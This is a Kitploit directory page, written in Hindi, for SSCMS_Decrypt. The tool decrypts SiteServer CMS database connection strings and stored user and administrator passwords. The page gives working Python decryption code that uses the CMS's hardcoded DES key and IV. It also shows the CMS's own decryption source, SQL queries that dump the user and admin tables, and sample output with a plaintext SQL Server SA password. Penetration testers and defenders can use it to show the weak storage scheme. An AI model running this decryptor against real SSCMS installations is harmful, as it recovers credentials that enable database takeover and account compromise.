Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
SSCMS_Decrypt — sscms database decrypt | Kitploit
उपकरण/GitHubGitHub/jas502n/sscms_decrypt
Password CrackingEncryption/Decryption ToolsVulnerability AnalysisWeb SecurityDatabase Security
GitHubjas502n/sscms_decrypt

SSCMS_Decrypt

sscms database decrypt

रिपॉजिटरी देखें
1034 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

sscms(siteserver cms) डेटाबेस डिक्रिप्ट

परिचय: SSCMS .NET Core पर आधारित है, जो न्यूनतम लागत, न्यूनतम मानव संसाधन निवेश और कम से कम समय में एक पूर्ण-विशेषताओं वाला, उत्कृष्ट प्रदर्शन वाला, बड़े पैमाने का तथा आसानी से रखरखाव योग्य वेबसाइट प्लेटफ़ॉर्म स्थापित कर सकता है।

प्रोजेक्ट पता: https://github.com/siteserver/cms

Des डिक्रिप्ट

https://github.com/siteserver/cms/blob/master/src/SSCMS/Utils/DesEncryptor.cs

root@kitploit:~

 python3 sscms_decrypt.py
 
[+] Current Encrypt Data= 0NofLD4zWcY/jm+42NYzug==
[+] secretKey= f9c01027
[+] iv_hex= 1234567890abcdef
[+] 数据库类型:SqlServer

[+] Current Encrypt Data= B0SvIg6ExtjhllXf3vb9UwjmLKSRMlqQ1LIs6a8G0G/M1cWZ2ABJ6lvZOMlvKR+vM7/QKGc8pYo8t6sumMerqA==
[+] secretKey= f9c01027
[+] iv_hex= 1234567890abcdef
[+] 数据库配置信息:Server=192.168.77.200;Uid=sa;Pwd=p@ssw0rd2020;Database=sscms;

sscms.json

root@kitploit:~

{
  "IsNightlyUpdate": false,
  "IsProtectData": true,
  "AdminDirectory": "siteserver",
  "HomeDirectory": "home",
  "SecurityKey": "f9c01027278a387b",
  "Database": {
    "Type": "0NofLD4zWcY0slash0jm0add042NYzug0equals00equals00secret0",
    "ConnectionString": "B0SvIg6ExtjhllXf3vb9UwjmLKSRMlqQ1LIs6a8G0G0slash0M1cWZ2ABJ6lvZOMlvKR0add0vM70slash0QKGc8pYo8t6sumMerqA0equals00equals00secret0"
  },
  "Redis": {
    "ConnectionString": ""
  }
}

सिस्टम इंस्टॉल होने के बाद, SS CMS सिस्टम डेटाबेस कनेक्शन जानकारी sscms.json कॉन्फ़िगरेशन फ़ाइल में संग्रहीत करेगा:

  • IsProtectData: क्या डेटाबेस कनेक्शन एन्क्रिप्टेड रूप से संग्रहीत किया जाता है
  • SecurityKey: एन्क्रिप्शन कुंजी, सिस्टम द्वारा यादृच्छिक रूप से उत्पन्न
  • Database:Type: डेटाबेस प्रकार
  • Database:ConnectionString: डेटाबेस कनेक्शन स्ट्रिंग

डेटाबेस उपयोगकर्ता पासवर्ड तालिका डिक्रिप्ट

फ्रंट-एंड उपयोगकर्ता तालिका:

फ्रंट-एंड लॉगिन पता: http://x.x.x.x/home/pages/login.html image

SELECT * FROM jxxt.dbo.siteserver_User

बैक-एंड व्यवस्थापक तालिका

बैक-एंड लॉगिन पता: http://x.x.x.x/SiteServer/pageLogin.cshtml

image

SELECT * FROM jxxt.dbo.siteserver_Administrator

image

संबंधित डिक्रिप्शन कोड:

https://github1s.com/siteserver/cms/blob/siteserver-v6.13.0/SiteServer.CMS/Provider/AdministratorDao.cs#L1126

root@kitploit:~
        private string DecodePassword(string password, EPasswordFormat passwordFormat, string passwordSalt)
        {
            var retVal = string.Empty;
            if (passwordFormat == EPasswordFormat.Clear)
            {
                retVal = password;
            }
            else if (passwordFormat == EPasswordFormat.Hashed)
            {
                throw new Exception("can not decode hashed password");
            }
            else if (passwordFormat == EPasswordFormat.Encrypted)
            {
                var encryptor = new DesEncryptor
                {
                    InputString = password,
                    DecryptKey = passwordSalt
                };
                encryptor.DesDecrypt();

                retVal = encryptor.OutString;
            }
            return retVal;
        }

DecryptKey = passwordSalt

passwordSalt के माध्यम से DecryptKey मान प्रारंभ करके DES डिक्रिप्शन किया जाता है,

root@kitploit:~
		/// 解密密钥
		/// </summary>
		public string DecryptKey
		{
			get { return _decryptKey; }
			set { _decryptKey = value; }
		}

अनुसरण करें var encryptor = new DesEncryptor encryptor.DesDecrypt();

अर्थात DesEncryptor.DesDecrypt() विधि को कॉल करें

root@kitploit:~
		public void DesDecrypt()
		{
		    byte[] iv = { 0x12, 0x34, 0x56, 0x78, 0x90, 0xAB, 0xCD, 0xEF };
		    try
			{
				var byKey = Encoding.UTF8.GetBytes(_decryptKey.Substring(0, 8));
				var des = new DESCryptoServiceProvider();
				var inputByteArray = Convert.FromBase64String(_inputString);
				var ms = new MemoryStream();
				var cs = new CryptoStream(ms, des.CreateDecryptor(byKey, iv), CryptoStreamMode.Write);
				cs.Write(inputByteArray, 0, inputByteArray.Length);
				cs.FlushFinalBlock();
				Encoding encoding = new UTF8Encoding();
				_outString = encoding.GetString(ms.ToArray());
			}
			catch (Exception error)
			{
				_noteMessage = error.Message;
			}
		}

संबंधित python3 कोड:

root@kitploit:~

import base64,pyDes

def sscms_decrypt(encodeData):
    var1 = encodeData.replace("0secret0", "").replace("0add0", "+").replace("0equals0", "=").replace("0and0", "&").replace("0question0", "?").replace("0quote0", "'").replace("0slash0", "/")
    var2 = base64.b64decode(var1)
    print("[+] Current Encrypt Data= " + var1)
    secretKey = 'Y2MlWp4hGY2Wcb9tzIiR2w=='[0:8]
    print("[+] secretKey= " + secretKey)
    iv_hex = "1234567890abcdef"
    iv = bytes.fromhex(iv_hex)
    print("[+] iv_hex= " + iv_hex)
    k = pyDes.des(secretKey, pyDes.CBC, iv, pad=None, padmode=pyDes.PAD_PKCS5)
    return k.decrypt(var2) + b"\n"

Data = "VpGCBufzbT+j/zYDjDmtWw=="

print(sscms_decrypt(Data).decode("utf-8"))
टूल डाउनलोड करें